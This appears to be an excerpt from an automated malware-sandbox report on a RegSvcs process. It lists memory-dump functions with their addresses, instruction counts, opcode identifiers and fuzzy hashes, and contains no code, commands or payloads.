Instruction ID: 95980ab9599780a2382183d810263356acf614cdcb3b04a57e7296371c40b486
Opcode Fuzzy Hash: eb48ec864ba1ca0bccc7d8d307a18e0cf2719ee579e984127d1d552b724fedfb
Instruction Fuzzy Hash: 0641F261E0DB865FE345BB784866679ABD1EF667C0F0804FEC04ACB5DBDE1C68488345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B784A9 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a606a0cf426fe12cdc4aa425ad9fa78f4fd7e830546e1cc505a0ccfb7a6aa1
Instruction ID: 48fe30e3bb75f35e1f685e5e22adc1342adcda7606f8ff73a833baa21456c116
Opcode Fuzzy Hash: a1a606a0cf426fe12cdc4aa425ad9fa78f4fd7e830546e1cc505a0ccfb7a6aa1
Instruction Fuzzy Hash: 0931D77180DB888FDB19DF68C8496EABFF0EF56320F04419FD08AC7562D7686849CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA1FE7 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46a5989bcff2aafc128080a644e0b5f79992a03bdca14843924f9f3b976bae0c
Instruction ID: bc364f2f350c1fe22aba0c7947933acf869ebeec821a29afd497c5338cb91085
Opcode Fuzzy Hash: 46a5989bcff2aafc128080a644e0b5f79992a03bdca14843924f9f3b976bae0c
Instruction Fuzzy Hash: 9E316F21F1EE4A1FE6D9FA2C046623951C3EF88AC5F99417AC00DC36D6EF6CDC52425A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B75177 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 004ff0617a8a3eec0d25fb5b3b04fa731e9b52d6ccedd97d36f01061200ea0e6
Instruction ID: 925c36e983da90202e28f8d750f6a488cb271676d38e352f68c1fd5516e4e9fb
Opcode Fuzzy Hash: 004ff0617a8a3eec0d25fb5b3b04fa731e9b52d6ccedd97d36f01061200ea0e6
Instruction Fuzzy Hash: 5D41F721A0D7868FE759EB248810AA63B92DF66390F1941FDC04ECB9D7CE2C6C448399

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA256D Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9d015d0bd01121abe7254b1007c90e776aaffd1a1c6b3fa9822cd3f95eb1dc
Instruction ID: c383d83dd5d6bce25b55853d7a86909311495804748344e08312ec307c69705c
Opcode Fuzzy Hash: eb9d015d0bd01121abe7254b1007c90e776aaffd1a1c6b3fa9822cd3f95eb1dc
Instruction Fuzzy Hash: FA210521B0EE4B1EE695FB2810221B963C2FF556C8F0411BAC44EC3687EE9CE8124356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA1CA9 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a402706d5c617db726ff1b771d1ff81a0d5ada66b4922aad3eb2103a136c3876
Instruction ID: 82700e6cc8e7fead4b8a44f8ae91b064c8760d933c5cddd4bfc410eaa174b3ba
Opcode Fuzzy Hash: a402706d5c617db726ff1b771d1ff81a0d5ada66b4922aad3eb2103a136c3876
Instruction Fuzzy Hash: 4121D722E0FBC61FE296E72C14162742AD2AF966D0F5900BAC44DC75D3EF989C05836A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7A26C Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4023148fc51ec1114f9bb2c0fe791b836c43ee30783f4c191b2cfa5a5ebafa92
Instruction ID: 3f31f69a019c1372cb387973bacb9238070e6d4a34d96571c652d0d7851dda19
Opcode Fuzzy Hash: 4023148fc51ec1114f9bb2c0fe791b836c43ee30783f4c191b2cfa5a5ebafa92
Instruction Fuzzy Hash: 4F31073591DA814FD789EF2848259A57BD1EF5A340F0901FEC48ECB6C7DE2CAC418389

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7A425 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2468c6fcc0eec2834c1e46959e8ca612579b0465ebdf814b80d0061f0a9182b
Instruction ID: c0f583083ef602d0ad304084403f4b298d82cda5bc7cb0ef820887116c863cd7
Opcode Fuzzy Hash: b2468c6fcc0eec2834c1e46959e8ca612579b0465ebdf814b80d0061f0a9182b
Instruction Fuzzy Hash: 3731463590CA854FD789EF2488259B57BD1EF5A340F0801FEC48ACB6C7DE2968458789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA62E1 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18e7f0f41033ed1308afb8089243c2593c95d37c6307c78ed26a66ea20d64e9
Instruction ID: f5e38bcf95c73461c2819522b9c173277ddc7fc50938d2b20cff346fbf157fc3
Opcode Fuzzy Hash: b18e7f0f41033ed1308afb8089243c2593c95d37c6307c78ed26a66ea20d64e9
Instruction Fuzzy Hash: 1E21A121F0EE4B0FE699FA2C106627951C3EFD86D0F590179C40EC36C6DF99EC02466A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA6264 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bfa2abf557c671fcc72c5a902672884fbc82042836c21ed83f5a0ffa69548f4
Instruction ID: c103cad0f31cec08e5cd153d35aaa6a9fc1080fd27f90c572a17fb1a5354dd1d
Opcode Fuzzy Hash: 9bfa2abf557c671fcc72c5a902672884fbc82042836c21ed83f5a0ffa69548f4
Instruction Fuzzy Hash: 9B219D11F0EE4B0FE6A9FA2C106627952C3EFD86D0F580179C40EC36C6DF98EC02466A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B792AE Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a62a5775e5d95376804c803e86990d43acaa1c5f86da554fd7bd67328c0f8d3
Instruction ID: 21570ced3e610badddb3f014f572eebce65276a6f0c0b19f447c66e67fb9dabd
Opcode Fuzzy Hash: 0a62a5775e5d95376804c803e86990d43acaa1c5f86da554fd7bd67328c0f8d3
Instruction Fuzzy Hash: BE31C162D0DA860FE38ABB3448256A8BBD1EF56790F0404FDC48EDB4D3DE1C69448789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B80C70 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d92f2b3a5099e41f0acce92dc6c669a5f4ff68dd0baf355a061da70fe8f558
Instruction ID: b598734eb004c0d75b43a36163ec4ec0ebe399e323e0f5c436e14b57f4ed5208
Opcode Fuzzy Hash: 68d92f2b3a5099e41f0acce92dc6c669a5f4ff68dd0baf355a061da70fe8f558
Instruction Fuzzy Hash: D8317F21D0DD4A4FE289BB244425B7526D1EF663D4F0901FEC44EDB6D3CE2C6C8687A9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7AAF9 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67bd8588029513eea834a884f32b9c1d9b1e538937a531e3a6b3a5173199ad0
Instruction ID: 4eb968795758355e9c2cbe4d67ebdbcac1f99026baaf16ec2c8d6da6e7bc23b4
Opcode Fuzzy Hash: d67bd8588029513eea834a884f32b9c1d9b1e538937a531e3a6b3a5173199ad0
Instruction Fuzzy Hash: A8110331A0DF5C1FD759F62CAC564AC7BE2EF96660B0402BBE049C3293CE55AC028386

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B72AE0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42456f6a65edb139cea636925361d96e33391e073f28cd8abbec8f3e970b74dd
Instruction ID: 49604d10bc20047ba274bd01570f2d1e0ed437a613181fb8d19c0010d4d15b8f
Opcode Fuzzy Hash: 42456f6a65edb139cea636925361d96e33391e073f28cd8abbec8f3e970b74dd
Instruction Fuzzy Hash: 5821F932D0CA468FEB54FB6894166F97791EF593A0F0401BAC04FD76C7DE2868464395

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7E16F Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9080a61b19b41f96d3f509c0145c1c30992c85d815633582c4394a8ee0748eaf
Instruction ID: cbe9ce1d6c51f0797a29f5a2ce34f694e30d6a768c0c7f63efa853db49fcd37b
Opcode Fuzzy Hash: 9080a61b19b41f96d3f509c0145c1c30992c85d815633582c4394a8ee0748eaf
Instruction Fuzzy Hash: 01212C61D1DA8A4FE385F7784866A656AD1EF5A780F0405FEC04DCB6D3DE1C68488319

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7C264 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ddb38d28f1c93bc439a879e023071f7f0a765c06a5d69f72184a54ec99d802
Instruction ID: f019231cb4cb773022f8eca54c688a660eed366fc5cc5896e0210a005117818f
Opcode Fuzzy Hash: 00ddb38d28f1c93bc439a879e023071f7f0a765c06a5d69f72184a54ec99d802
Instruction Fuzzy Hash: 4211E231A0DB898FD706FFA88464A697BE2EF55340F0446BDC44AC76D7DB3868488748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7A3A1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0735ab1251295d0f6ec38f8ba7726251dcb96ed3cdb0c45d4e772a657733b40b
Instruction ID: f3325e76d87f97fd868b83d07dd9ac429504855f6610391e6bf85a6c774525f3
Opcode Fuzzy Hash: 0735ab1251295d0f6ec38f8ba7726251dcb96ed3cdb0c45d4e772a657733b40b
Instruction Fuzzy Hash: 60110B25D0D6814FE399FB2848269757B92DF55780F0911FED44DCB6C7CE1C6C808356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B80CCB Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3589995638c92e1c2602fb865432417bf1dd95d2fdb3b83a69c986a6c68829d6
Instruction ID: e9af36878aab8fe4129ab2ae1c3c7faef8c312c2699e0fa64c4e7512a5e40867
Opcode Fuzzy Hash: 3589995638c92e1c2602fb865432417bf1dd95d2fdb3b83a69c986a6c68829d6
Instruction Fuzzy Hash: A2119021D0CD564FE295BB248425A7426D1EF653C4F1401FAC44ECB9E3DF286D4A87A9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B70966 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06b7676666fc8e207e7a0e98f0b501c8e0478afd53b35565a40220f772f0e23c
Instruction ID: 6a210790122110067d9a5a30cfc7ec2beebb6a37aeb0fa07034317721a2b2feb
Opcode Fuzzy Hash: 06b7676666fc8e207e7a0e98f0b501c8e0478afd53b35565a40220f772f0e23c
Instruction Fuzzy Hash: FD11862090D7855FD359FB7884556A53FE2EF2A384F1404FEE08ECB693DE686805871D

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7824B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675586e43cb8858b9ab8ac2d7e22ea60782a7ed1d7658e96cf22073429788b13
Instruction ID: 3d39bf90b1f105f52ee98fe513388c970d16834b0b8dadffb1b9434e1df19566
Opcode Fuzzy Hash: 675586e43cb8858b9ab8ac2d7e22ea60782a7ed1d7658e96cf22073429788b13
Instruction Fuzzy Hash: 1A11C17190DB894FD709EB188424AA93BE1EF69340F0442BED08EDB5D3DE3859449748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B73CCC Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f17be71a38d76733ec0519ddd972f2220200f19df9c05450be106af8bccc48
Instruction ID: 2e13df6c05652d141a24dac16ea4e3140969bea26af98025d360a5a2f1d741bf
Opcode Fuzzy Hash: e7f17be71a38d76733ec0519ddd972f2220200f19df9c05450be106af8bccc48
Instruction Fuzzy Hash: E4012621A0EBC64FE316A77D4865AA57B81EF59390F4402BAD009CB2D7DE1C6848835A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B806D6 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bf8757debd56eed930e2b793ee62cc5b755a5ba36c20f1b7f8223d83f7654a
Instruction ID: 7f435bdc141937e2c7129697c19f85df3d461e061fd44d969080eaa1c5fdec82
Opcode Fuzzy Hash: c4bf8757debd56eed930e2b793ee62cc5b755a5ba36c20f1b7f8223d83f7654a
Instruction Fuzzy Hash: BD11A07190DA8A8FE704FFA4C865AB9BBB1EF55384F0404BEC44ADB1D2DF7829058764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7ED81 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c986d20ecdfcae07bf44b94a0a2747e024961b6193fe36a0f24f1b83f31d6c
Instruction ID: 8e97ff7836a2a917b7ff6052583badb80a93f102606ba5c3b78efb85933bae3b
Opcode Fuzzy Hash: 57c986d20ecdfcae07bf44b94a0a2747e024961b6193fe36a0f24f1b83f31d6c
Instruction Fuzzy Hash: D9012B30D0D6894FEB52FA688C51A95BBA2EF96754F0540F6D04DCB593DA2C58418309

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7A4D3 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18bf8ea5df95eeb9141054df883125f6808131f2c1266f79327515c55b3fe1db
Instruction ID: 14280a5da8855f3c1cd6ec62100b979ad9258c3ea9fa44cd1fca16e0c036766e
Opcode Fuzzy Hash: 18bf8ea5df95eeb9141054df883125f6808131f2c1266f79327515c55b3fe1db
Instruction Fuzzy Hash: 7601246581DACA4FE3D6FB28043A5756A92EF99380F0800F8D00DC7187DE1868848346

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B75EDC Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e09573add401c09c011b5dd620d5375506060dea18fa696a4b58b3a90408a02
Instruction ID: 9e857502f9f34bc8edb0871443701a8cd98dcaed4bcc2a6a835f172f2741f1d0
Opcode Fuzzy Hash: 5e09573add401c09c011b5dd620d5375506060dea18fa696a4b58b3a90408a02
Instruction Fuzzy Hash: 7A018431E0C64A8FE748EB24C4657B97692EF69390F5441BDC00ECB5D3DE29A9858704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B80B40 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5222209cb483fa734ae4fe0b0ae9e481676dfedbd03259cb2db6c6bd0adf694
Instruction ID: d60a046ac7a07c01baff06dd5ffdb09c22e6682d3d7c4d356d3f786c1547de55
Opcode Fuzzy Hash: d5222209cb483fa734ae4fe0b0ae9e481676dfedbd03259cb2db6c6bd0adf694
Instruction Fuzzy Hash: 1E01D822D0DD964FE34ABB6044346747BD19F663C4F0501FEC04ADB5D3DE28190587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B72B6F Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc595c39ce629a403ad5d1291dfc9689d894b71fd3a5b34d0879d15b4c715a5
Instruction ID: 0866a24bd0e21521105cd202539d2f033b7d8724014de7bffa91814f45957b63
Opcode Fuzzy Hash: 4dc595c39ce629a403ad5d1291dfc9689d894b71fd3a5b34d0879d15b4c715a5
Instruction Fuzzy Hash: D901D131D1CE4A9FEB05FB1888556B9B392FF98390F1902B5C40ED7686CE28B8814795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B73ECE Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90199fda6e69bac73c68f90143d07e4d7ead9d19f83c2fa050a6115b99861592
Instruction ID: 36625d03edb21ea57f6257a483102fa4fdd9c2bac176afa889581d679cecafaa
Opcode Fuzzy Hash: 90199fda6e69bac73c68f90143d07e4d7ead9d19f83c2fa050a6115b99861592
Instruction Fuzzy Hash: 68F0FC31E0D6468FE348FB2888615797792EF89791F5406BEC04EC76DBDA3C9881525C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7810E Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574fae22f9444ed6fb69f64a9811aaedfa3c25ef62e2dac6206c50b27929bd40
Instruction ID: ff2df36ed5abda91b2380276c6d3d1aea16c5ef220507185b051e5d89d4a72ab
Opcode Fuzzy Hash: 574fae22f9444ed6fb69f64a9811aaedfa3c25ef62e2dac6206c50b27929bd40
Instruction Fuzzy Hash: 6BF0C232A0D6894FD319EA2488609A537A2EB9A390F1642FAC08ACF5D7DF345911D348

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B742D4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beddfda70122f6fe0a08de69658b6c2f7857258f61bc7ee32a52339bb96b9e5c
Instruction ID: 857c9331138a59a6832c7047b00bbacff1df532b2205625a1165b2c8af9453b3
Opcode Fuzzy Hash: beddfda70122f6fe0a08de69658b6c2f7857258f61bc7ee32a52339bb96b9e5c
Instruction Fuzzy Hash: 9DF0C232A0D7564FE711EB589510AE93795EF563A2F0501F6C409CB9E7EB2828088794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B73BEC Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec4395aa9c586a6c4df1104013d702b2b10a8ac71d914e29f6eb63f01062380
Instruction ID: 2bfaf007ab15fef0d10a6312c1179d945b0641d0dd7b8c05d1062dcefcc429f0
Opcode Fuzzy Hash: fec4395aa9c586a6c4df1104013d702b2b10a8ac71d914e29f6eb63f01062380
Instruction Fuzzy Hash: CBF02E61B0DB868FE305F76C88256B97752DF9A390F4443F5C00ACB6D7DD2C58444384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7EC1B Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c4aa19db671c975dbea032a43b77c9bec93c1daf5ab1fabfe3a4b2b6eefb0b
Instruction ID: c998acb78313111fecf237b8c4cfe9db26d75c8687867c1e4efe198efe61b437
Opcode Fuzzy Hash: 70c4aa19db671c975dbea032a43b77c9bec93c1daf5ab1fabfe3a4b2b6eefb0b
Instruction Fuzzy Hash: D8F09665D0D7C59FE349AB344829764AF91EF56784F1900FEC04ACF5C3DE1C15498319

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B785F9 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962dc50ca357435769c3011006baafdcd1cbd40dd7d6911c04f3b06b3623a19c
Instruction ID: e43fe6b83192d04a2c448c6a52b2adcbcac7c1eaba0af99bcbdb0e56e77fb541
Opcode Fuzzy Hash: 962dc50ca357435769c3011006baafdcd1cbd40dd7d6911c04f3b06b3623a19c
Instruction Fuzzy Hash: CFE09220A09B884FC74E9629886D5607BF1EB6621179942DBD441CF1B3E918DCC9C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7CD2F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334d255c4f503e416c5383968a21f666026b727a0b03e4510ac4be79ddcbf09d
Instruction ID: 6b3458a8aa16705b2b28d6603da379c7fb9fa99169c7df4308b12bbacb32d90f
Opcode Fuzzy Hash: 334d255c4f503e416c5383968a21f666026b727a0b03e4510ac4be79ddcbf09d
Instruction Fuzzy Hash: B3F0A730E2C7484FD719EF28C062979BBE2EF59344F11017DD08ED3682CF24A4018B49

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA2539 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24719685dbd47f5499ced3df2db36e86e18cf80b28f2582d12fb28a0c3e885c4
Instruction ID: 397785a6a3b3e627f824a339ecf28f6c3bddac50479385be9921794bf0f03dc3
Opcode Fuzzy Hash: 24719685dbd47f5499ced3df2db36e86e18cf80b28f2582d12fb28a0c3e885c4
